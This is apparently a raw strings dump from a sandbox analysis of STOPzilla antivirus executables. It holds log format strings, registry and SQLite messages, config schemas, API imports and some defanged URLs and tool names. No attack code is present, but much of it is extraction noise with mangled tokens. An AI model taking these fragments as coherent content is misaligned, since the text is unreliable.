Couldn't memory to get data from file path=[%s]. Leave now
Failed reading data from hosts file path=[%s]. Leave now.
Push data host into collection [HostName:IpAddr]=[%s:%s]
Couldn't get wisock version from registry location [hive,key,value]=[0x%x:%s]. Leave now.
Got wisock version from registry location [hive,key,value]=[0x%x:%s] successfully.
Found no subkeys under [hive,key]=[0x%x:%s]. Returning now.
Got no data from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
Got registry binary value successfully from [hive:key:value]=[0x%x:%s:%s]. Proceed normally.
Unknown value type queried from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
Couldn't query value from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
mswsock.dll
rsvpsp.dll
Couldn't resolve path=[%s]. Go to next item.
Couldn't get file info from path=[%s]. Go to next item.
Got version info, dwInfoSize=[%d] and pInfoBuff=[0x%p].
Unexpected file version data structure size, uiDataLen=[%d]. Leave now.
XX
FileVersion = <%s>
CompanyName = <%s>
ProductName = <%s>
SpecialBuild = <%s>
InternalName = <%s>
PrivateBuild = <%s>
FileDescription = <%s>
ProductVersion = <%s>
LegalCopyright = <%s>
LegalTrademarks = <%s>
OriginalFileName = <%s>
Couldn't open file to calculate the MD5, errno = %d, strPath = %s.
Couldn't set mode to file, errno = %d, strPath = %s.
Source file path must be a valid full path, strPath=<%s>. Leave now.
Couldn't calculate the MD5, strPath=<%s>. Proceed normally now.
Couldn't get version information from file strPath=<%s>. Proceed normally now.
Couldn't open file, strPath=<%s>. Proceed normally now.
Couldn't get file times, strPath=<%s>. Proceed normally now.
Windows
Operating System
(Export Version)
Calculated non-version file info successfully, strPath=<%s>.
Path to file [%s] found on [%s].
Invalid file name [%s].
inetinfo.exe
Path to file [%s] NOT found.
Path to file in the registry [%s] found on [%s].
Invalid command string path strCmd=[%s].
CSBFileSystem::ResolveCmdLine
%1\"" %*
""%1"" %*
Got valid full path for strResolvedCmd=[%s].
Got valid full path for strResolved=[%s].
Got valid full path strResolved=[%s].
Invalid file path or name [%s]
Invalid directory path [%s]
Couldn't test folder existance [%s].
Folder existance tested successfully [%s].
Invalid path [%s]
Skipping default directories under [%s]
Couldn't traverse all files under [%s]
Directory doesn't exist [%s].
Failed getting info of all files under path=[%s].
Got info of all files under path=[%s].
Failed to get files under directory path=[%s].
Current file to get info from [%s].
File doesn't exist path=[%s].
Couldn't get hive handle: Hive:Key=[0x%x:%s].
Couldn't get hive handle: Hive:Key:Value=[0x%x:%s:%s].
Couldn't get registry key: Hive:Key:Value=[0x%x:%s:%s].
No buffer nor size for data : pbvData = 0x%p, dwSize = %d.
No size for data buffer : pbvData = 0x%p, dwSize = %d.
Get registry value : Hive:Key:Value=[0x%x:%s:%s].
Registry value successfully queried: Hive:Key:Value=[0x%x:%s:%s].
Registry value size successfully queried: Hive:Key:Value=[0x%x:%s:%s], dwDataSize = %d.
Got no data from registry location [hive:key:value]=[0x%x:%s:%s]. Leave now.
Got registry string successfully, strData=%s : Hive:Key:Value=[0x%x:%s:%s].
CSBRegistry::EnumRegistrySubkeyColl
Enumerate all subkeys under a given key : Hive:Key=[0x%x:%s].
Got subkey [index=%d, name=%s] successfully from: Hive:Key=[0x%x:%s].
Failed enumerating subkeys from: Hive:Key=[0x%x:%s].
Couldn't get registry key: Hive:Key=[0x%x:%s].
Invalid value or data sizes, dwValue=%d, dwData=%d : Hive:Key=[0x%x:%s].
Found the value [%s] under [hive:key]=[0x%x:%s] successfully.
Failed enumerating values from: Hive:Key=[0x%x:%s].
Found [%d] values under [hive:key]=[0x%x:%s] successfully.
No values were found under [hive:key]=[0x%x:%s] successfully.
gAdvapi32.dll
Got process dwPID=[%d] file path [%s].
Couldn't get file name on process id [%d] to get its path.
Couldn't open process id [%d] to get its path.
Couldn't get module handle from process PID[%d]
Couldn't get info from module handle from process PID[%d]
Unable to set platform info platform ID<%d>, BuildNo<%d> MajorVersNo<%d> MinorVersNo<%d> ServicePackInfo<%*.*s>
SHGetFolderPath API call failed when getting CSIDL <%d>
SHGetSpecialFolderPath API call failed when getting CSIDL <%d>
Got CSDIL path <%s> successfully
Failed to expand environment strings <%s>
Source string <%s> is too big when expanded <%d>
Source string <%s> expanded to <%s>
Couldn't get registry data value from registry location [hHive:Key:Value]=[%d:%s:%s]. Leave now.
Couldn't expand any environment variables on <%s>
%SYSTEMDIRECTORY%
%SYSTEM%
%SYSTEMROOT%
%WINDOWS%
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ACTIVEX CACHE
%DOWNLOAD_PROGRAM_FILES%
%STARTUP%
%COMMON_STARTUP%
%COOKIES%
ÞSKTOPDIRECTORY%
úVORITES%
%STARTMENU%
%COMMON_STARTMENU%
%COMMON_PROGRAMS%
%COMMON_FAVORITES%
%COMMMON_ALTSTARTUP%
%COMMON_DESKTOPDIRECTORY%
%COMMON_APPDATA%
ÞFAULT_STARTUP%
%DRIVERS_ETC%
Got full path <%s> from abreviated path <%s>
Couldn't find full path for abreviated path <%s>
Failed getting file path for the shell link object, hr=[%d].
Failed getting description for the shell link object, hr=[%d].
Couldn't find shell link object shortcut, hr=[%d].
Couldn't open shell link object shortcut, hr=[%d].
Assertion failed: %s, file %s, line %d
74.0.0
7.0.0.4
%Program Files% (x86)\STOPzilla\SBAMSvc.exe
SBAMSvc.exe

SBAMSvc.exe_3448_rwx_00D60000_00001000:

.edata
.rsrc
.rdata
.debug
.idata
.reloc

SBAMSvc.exe_3448_rwx_00D90000_00004000:

gmer.dllGMERgmer.exe -l.text
.rsrc
.data
.rdata
checkpoint.com
\\.\PrimaxPointingDeviceFilterSoftware\Primax\Mouse Suite 98.text
.reloc
.idata
hXXp://tufei
03.ho
4u.ch
SET RESCUEAPP_MAJOR=%d
SET RESCUEAPP_MINOR=%d
.text
pexcel.jar
pocketword.jar
xmerge.jar
clasOpenOffice.org Calc
OpenOffice.org Calc XML Document
{C6AB3E74-9F4F-4370-.reloc
ADVAPI32.dll
USER32.dll
KERNEL32.dll
COMCTL32.dll
WhatsUp-Setup.exe
.rsrc.data.rdata.textPEMZ
techinline.com
idlecrawler.com
support@fixila.com
WEB PICK - INTERNET HOLDINGS LTD
Webroot Inc.
ComboFix.exe
14.3.1.53697
.ndata
icuuc40.dl
Winlogon.exe
%SYSTEM%\Winlogon.exe
masswatermark.com

SBAMSvc.exe_3448_rwx_00DA0000_00006000:

<%@ ControlMasterImport Namespace
Mimetype_mscab found type %d

STOPzilla.exe_3836:

.text
`.rdata
@.data
.rsrc
@.reloc
t.jTj
t.jtj
t.jpj
u.PPh
t.jHj
t.jhj
t.jLj
t.jPj
uO8^ItJSSh7
8SQLi
u.hp{
f;F.sA
f;H.sA
L$4f;P.sF3
.6.78.9:;
B.CDEFFG
FUu.AUu FUu
pt.Vot/vptClpt
setting_smtp
email_advanced_error_port
cleaner_option_report
scan_month_select_day_%d
scan_day_select_day_%d
<\>.ZH
theme.dialogs.dialog(descriptor:
license_instance_key
support_phone_demo
support_phone_expired
support_phone_full
support_phone_suspended
support_phone_free
support_phone_current
pipe.closed
setting.app.direct3d
option_flag_enforcer_execution
action_support
support_back
support_action_chat
support_action_web
support_action_email
support_action_phone
support_value_instance
page_support
scan.results_xml
options_support_instance_copy_failed
options_support_instance_copied
setting.app.show-splash
scheduled.phone-home.get.vipre-targets
settings.app.battery-power
setting.app.notify-detected-threats
settings.scan.root-kits
settings.scan.low-priority
settings.scan.update
settings.scan.archives
settings.scan.low-severity
settings.scan.auto-clean
settings.scan.cookies
settings.scan.removable
theme.dialogs.dialog(descriptor:dialog_options)
nag.demo.next_nag
nag.expired.next_nag
nag.suspended.next_nag
nag.subscription.next_nag
activate_key_1
activate_key_2
activate_key_3
activate_key_4
activate_key_%d
activate_result_key_invalid
activate_result_key_inactive
external.reseller_id
theme.dialogs.dialog(descriptor:dialog_splash)
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.8.8.3
CREATE TEMP TABLE sqlite_temp_master(
</%s>
<!--%s-->
<?%s?>
<!%s>
operator >> (CSZVinaryData& failure
last-execute-time
last-execute-result
last-execute-result-text
stored-action.saved
never-executed
CSZStoredAction::Execute
pipe-name
CSZApplicationPipeClient::_Execute
CSZApplicationPipeClient::GetWrapper
CSZApplicationPipeClient::OnPacket
stored-action.deleted
external.edition
external.product
external.downloader_id
external.affiliate_id
Support
CSZHomeServiceLicense::ExtractSupport
CSZHomeServiceComponentResult::ParseTokenKey
CSZAppDB::ExecuteMigrationCode
CSZApplicationPipeServer::Reply
key-inactive
key-invalid
key-mismatch
key-in-use
SMTPErrorString
CloseEmailWindowMsg
BadUrlCheckingEnabled
BadUrlReplacementText
WindowsLiveMailClientEnabled
BadUrlActionEnum
Port
MsgID
RegKey
BaseURL
LogToWindowsEventLog
Password
custom.all-drives
custom.ignore-removable
custom.known-file-types
custom.processes
custom.cookies
custom.registry
custom.deep-processes
custom.derivatives
custom.all-users
custom.archives
custom.root-kits
custom.path.
custom.common-tactics
theme.assets
ds_noidlemsg
lbs_wantkeyboardinput
es_password
lvs_report
CSZHttpContentHandler::StatusCode
CSZHttpContentHandler::ContentLength
CSZHttpContentHandler::ReceiveContent
CSZHttpContentHandler::CompleteContent
CSZHttp::Request
CSZHttp::ReportStatusCode
CSZHttp::ReportContentLength
CSZHttp::ReportComplete
CSZHttp::ReportContent
CSZSQLDatabase::ExecuteSQL
CSZSQLDatabase::CompileSQL
SQLITE_
d:d:d
d-d-d
d-d-d d:d:d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s%c%s
recovered %d pages from %s
recovered %d frames from WAL file %s
cannot limit WAL size: %s
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
invalid page number %d
2nd reference to page %d
freelist leaf count too big on page %d
Page %d:
%d of %d pages missing from overflow list starting at %d
failed to get page %d
On tree page %d cell %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Page %d is never used
Fragmentation of %d bytes reported as %d on page %d
unknown database %s
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
%s(%d)
MJ collide: %s
-mjX9X
%s-mjXXXXXX9XXz
MJ delete: %s
FOREIGN KEY constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
FOREIGN KEY
%s constraint failed
cannot open savepoint - SQL statements in progress
abort at %d in [%s]: %s
%s constraint failed: %s
cannot commit transaction - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
database table is locked: %s
statement aborts at %d: [%s] %s
cannot change %s wal mode from within a transaction
cannot open value of type %s
cannot open table without rowid: %s
cannot open view: %s
cannot open virtual table: %s
indexed
cannot open %s column for writing
no such column: "%s"
foreign key
misuse of aliased aggregate %s
%s: %s.%s
%s: %s
%s: %s.%s.%s
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
hex literal too big: %s
%s%.*s"%w"
sqlite_rename_table
%.*s"%w"%s
%s OR name=%Q
sqlite_rename_trigger
sqlite_rename_parent
sqlite_
table %s may not be altered
type='trigger' AND (%s)
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
there is already another table or index with this name: %s
view %s may not be altered
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
sqlite_altertab_%s
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat3
sqlite_stat4
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
too many attached databases - max %d
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
unable to open database: %s
database %s is already in use
database %s is locked
no such database: %s
cannot detach database %s
%s %T cannot reference objects in database %s
%s cannot use variables
sqlite_detach
sqlite_attach
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
there is already an index named %s
object name reserved for internal use: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
too many columns on %s
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
PRIMARY KEY missing on table %s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE %s %.*s
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
table %s may not be dropped
use DROP TABLE to delete table %s
cannot create a TEMP index on non-TEMP table "%s"
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
views may not be indexed
virtual tables may not be indexed
table %s may not be indexed
sqlite_autoindex_%s_%d
table %s has no column named %s
there is already a table named %s
index %s already exists
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
no such index: %S
a JOIN clause is required before %s
%s.rowid
unable to identify the object to be reindexed
%s.%s
table %s may not be modified
cannot modify %s because it is a view
duplicate WITH table name: %s
no such collation sequence: %s
sqlite_version
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_source_id
sqlite_log
foreign key mismatch - "%w" referencing "%w"
%d values for %d columns
table %S has no column named %s
table %S has %d columns but %d values were supplied
unable to open shared library [%s]
sqlite3_
sqlite3_extension_init
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_check
defer_foreign_keys
foreign_key_list
foreign_keys
*** in database %s ***
NULL value in %s.%s
unsupported encoding: %s
malformed database schema (%s)
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
%s - %s
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
column%d
%s:%d
COMPOUND SUBQUERIES %d AND %d %s(%s)
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
circular reference: %s
table %s has %d values for %d columns
no such index: %s
multiple references to recursive table: %s
sqlite_sq_%p
too many references to "%s": max 65535
multiple recursive references: %s
recursive reference in a subquery: %s
no such table: %s
%s.%s.%s
SCAN TABLE %s%s%s
sqlite3_get_table() called with two or more incompatible queries
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
no such column: %s
no such trigger: %S
-- TRIGGER %s
cannot VACUUM - SQL statements in progress
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
PRAGMA vacuum_db.synchronous=OFF
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
vtable constructor did not declare schema: %s
vtable constructor failed: %s
automatic index on %s(%s)
no such module: %s
table %s: xBestIndex returned an invalid plan
ANY(%s)
AS %s
PRIMARY KEY
SUBQUERY %d
TABLE %s
COVERING INDEX %s
INDEX %s
VIRTUAL TABLE INDEX %d:%s
%s.xBestIndex() malfunction
USING INTEGER PRIMARY KEY
at most %d tables in a join
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
database corruption at line %d of [%.10s]
no such table column: %s.%s
X:\sz7.0.1.3\Build7\Release\x86\STOPzilla.pdb
mfc120u.dll
__crtGetShowWindowMode
_amsg_exit
_wcmdln
MSVCR120.dll
_calloc_crt
__crtSetUnhandledExceptionFilter
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
KERNEL32.dll
ExitWindowsEx
EnumChildWindows
GetKeyState
USER32.dll
GDI32.dll
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
MSVCP120.dll
RPCRT4.dll
MPR.dll
d3d9.dll
WinHttpOpen
WinHttpConnect
WinHttpCloseHandle
WinHttpOpenRequest
WinHttpSetOption
WinHttpQueryOption
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
EnumWindows
MsgWaitForMultipleObjectsEx
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
VERSION.dll
WaitNamedPipeW
.?AVCCmdTarget@@
.PAVCException@@
.PAVbad_cast@std@@
.PAVexception@std@@
.?AVDelegate@CSZApplicationPipeClient@@
.?AVListener@CSZHttpContentHandler@@
.PAVrange_error@std@@
.PAVruntime_error@std@@
.?AVCSZPWKeyValueNotify@@
.?AVDelegate@CSZApplicationPipeServer@@
.?AVCSZPacketPipeConnection@@
.?AVCSZPipeConnection@@
.?AVCSZApplicationPipeClient@@
.?AVCSZSQLDatabase@@
.?AVCSZPacketPipeClient@@
.?AVCSZPipeClient@@
.?AVCSQLMigrationStep@@
.?AVCVIPREWebFilterEvents@@
.?AU_ISBWebFilterEvents@@
.?AVCSZGraphicsShape@@
.?AVCSZGraphicsShapeRectangle@@
.?AVCSZHttpContentHandler@@
.?AVCSZPipeConnectionThread@CSZPipeConnection@@
.?AVCSZSQLStatement@@
<config include="common.xml">
<names include="common-names.xml">
<name descriptor="log-file"><![CDATA[stopzilla7.log]]></name>
<databases default="config" include="databases.xml" />
<s><![CDATA[<Component class="{{CLASS}}" option="{{OPTION}}"><License key="{{KEY}}" /></Component>]]></s>
<name descriptor="db-file"><![CDATA[sz7.data]]></name>
<name descriptor="pipe-name"><![CDATA[sz7-pipe]]></name>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB, user TEXT DEFAULT '')]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key,user)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX message_pk ON home_message(message_id)]]></sql>
<sql><![CDATA[CREATE INDEX message_read_k ON home_message(read_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_expires_k ON home_message(expires_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_type_k ON home_message(resource_type)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS stored_actions(id TEXT PRIMARY KEY UNIQUE NOT NULL, type TEXT NOT NULL, name TEXT NOT NULL, xml TEXT NOT NULL)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX stored_id_pk ON stored_actions(id)]]></sql>
<sql><![CDATA[CREATE INDEX stored_type_k ON stored_actions(type)]]></sql>
<value name="vipre.config.scan.known-apps.reset">true</value>
<sql><![CDATA[CREATE TABLE zilla_system(value TEXT, data TEXT)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX zilla_system_index ON zilla_system(value)]]></sql>
<sql><![CDATA[REPLACE INTO zilla_system (value, data) VALUES("db_version", "1.0.0.0")]]></sql>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key)]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS zilla_system]]></sql>
<sql><![CDATA[ALTER TABLE kv_data ADD COLUMN user TEXT DEFAULT '']]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS kv_data_key_index]]></sql>
<sql><![CDATA[DELETE FROM kv_data]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, home_id INTEGER, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, data TEXT, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE INDEX message_home_pk ON home_message(home_id)]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_home_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_read_k]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_expires_k]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS home_message]]></sql>
<sql><![CDATA[DELETE FROM stored_actions]]></sql>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0%1X1
1$2(2,202
78I8
2/2$3F3X3o3
1(2,2024282
4080<0@0
5_5S5h5u5
=$=<=]=~=
2&252\2}2
3]3&454{4
1o1v102F2%3X3x3
7%8X8
5Y5F5O5k5{5
9%9U9c9z9
8(9,9094989<9@9`9
2-2O2
3,4044484<4@4
> >$>(>,>0>4>8><>
8 8$8(8,82999
: :$:(:,:0:4:8:
6 6$6(6,60646
>#>)>9>?>
9 9$9(9,909
;(;7;\;~;
6%7U7
; ;$;(;,;
< <$<(<,<0<4<8<<<@<\=`=|=
< <$<(<,<0<4<8<<<@<|<
> >$>(>,>0>4>
0 0(0,0004080<0@0
3 3$3(3,3
7 7$7(7,7074787<7
:,=0=4=8=
%s (%s:%d)
%Program Files% (x86)\Microsoft Visual Studio 12.0\VC\atlmfc\include\afxwin1.inl
eu
Theme: Loading "STOPzilla" at "%s".
Theme: Failed Loading "STOPzilla" at "%s".
hXXp://VVV.stopzilla.com/
{8DFC6702-AF86-4CBB-9D8B-00055514603A}
Detected 'pipe.closed' trigger...
scan.custom.
scan.custom.partials
scan.custom.fulls
url_store
url_chat
url_support
email_support
durl_help
EMAIL AV: %s
durl_purchase
url_register
external.home_service_url
hXXps://secure.logmeinrescue.com/customer/Code.aspx
Content-Type: application/x-www-form-urlencoded
Support.exe
Global\update.binaries.skip_wait
url_renew
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows .Net
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 8
Windows 8.1
Windows 10
Windows 2012 Server
Windows 2012 Server R2
Web Server
%s ~%d MHZ
GetLogicalProcessorInformation is not supported.
Unable to determine windows version
%u.%u.%u
okernel32.dll
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Web Server Edition
Windows Server 2003 R2,
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003,
Web Edition
Windows XP
Windows 2000
(build %d)
[%d/%m/%Y %H:%M:%S]
(%s%s%s%s%s):
shfolder.dll
"%s" %s
hkcu\software\microsoft\windows\shell\associations\urlassociations\http\userchoice
hkcr\http\shell\open\command
%hs(%d): failed [%u|%s]
%hs(%u, %u): failed [%u|%s]
https
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
Kernel32.dll
%s%s%s%s
system.last_boot_time
e%hs: %hs named '%s' updated to %u
%hs: unable to parse received action content '%hs' [%u]
%hs: attempt to execute an action with no implementation!
support.phone.%
support.phone.
e%s Initializing
Process ID: %u
Unable to start pipe client. (0xX)
SetProcessAffinityMask failed [%u|%s]
Working Directory: %s
CSZLogManager::Initialize(0x%X) failed [%u|%s]
ConstructLogFile(%s) failed [%u|%s]
application-pipe-client
%hs: wait failed with unexpected result %u
%hs: no wrapper for opCode %u
%hs: unhandled incoming packet - opCode(%u)
e%hs: unable to compile empty or missing SQL statement
%hs: no database available for SQL statement '%s'
%hs: failed to compile SQL statement '%s'
%hs: found duplicate name '%s' for type '%hs'
CONFIG.XML
%hs: duplicate component (%d|%hs)
%hs: updated license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d)
t%hs: failed to update license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d) [%u|%s]
%hs: component '%hs' skipped with result %d
%hs: missing value for region '%s' and status '%hs'
%hs: duplicate region key '%s'
%hs: missing %d of %d expected statuses in region '%s'
%hs: invalid status value '%hs' for region '%s'
%hs: no token key provided
%hs: unexpected token key '%hs'
%hs: parse error on markup '%hs' [%u|%s]
%hs: element '%hs' not supported by config object factory
%hs: request execution failed
%hs: request failed with result %u [%s]
%hs: Received %u
Exception: %s
Failed: %s
%s in transaction
INSERT INTO migration_history (version, phase) VALUES (%d, %d)
Failed to get value '%hs' for user '%hs' [%d|%s]
Failed to set value '%hs' for user '%hs' [%u|%s]
Failed to get system value '%hs' [%d|%s]
Failed to delete value '%hs' for user '%hs' [%u|%s]
Failed to set system value '%hs' [%u|%s]
Failed to delete system value '%hs' [%u|%s]
Failed to delete %hs keys %s %s [%u|%s]
'%s' set aside but new file not opened
'%s' cannot be opened and cannot be set aside
'%s' not created
'%s' set aside and recreated
No phase %d (%hs) migration necessary; current migration is %d
'%s' cannot be set aside
Phase %d (%hs) migration mismatch - DB is %d and application is %d
Migrated phase %d (%hs) from version %d to %d
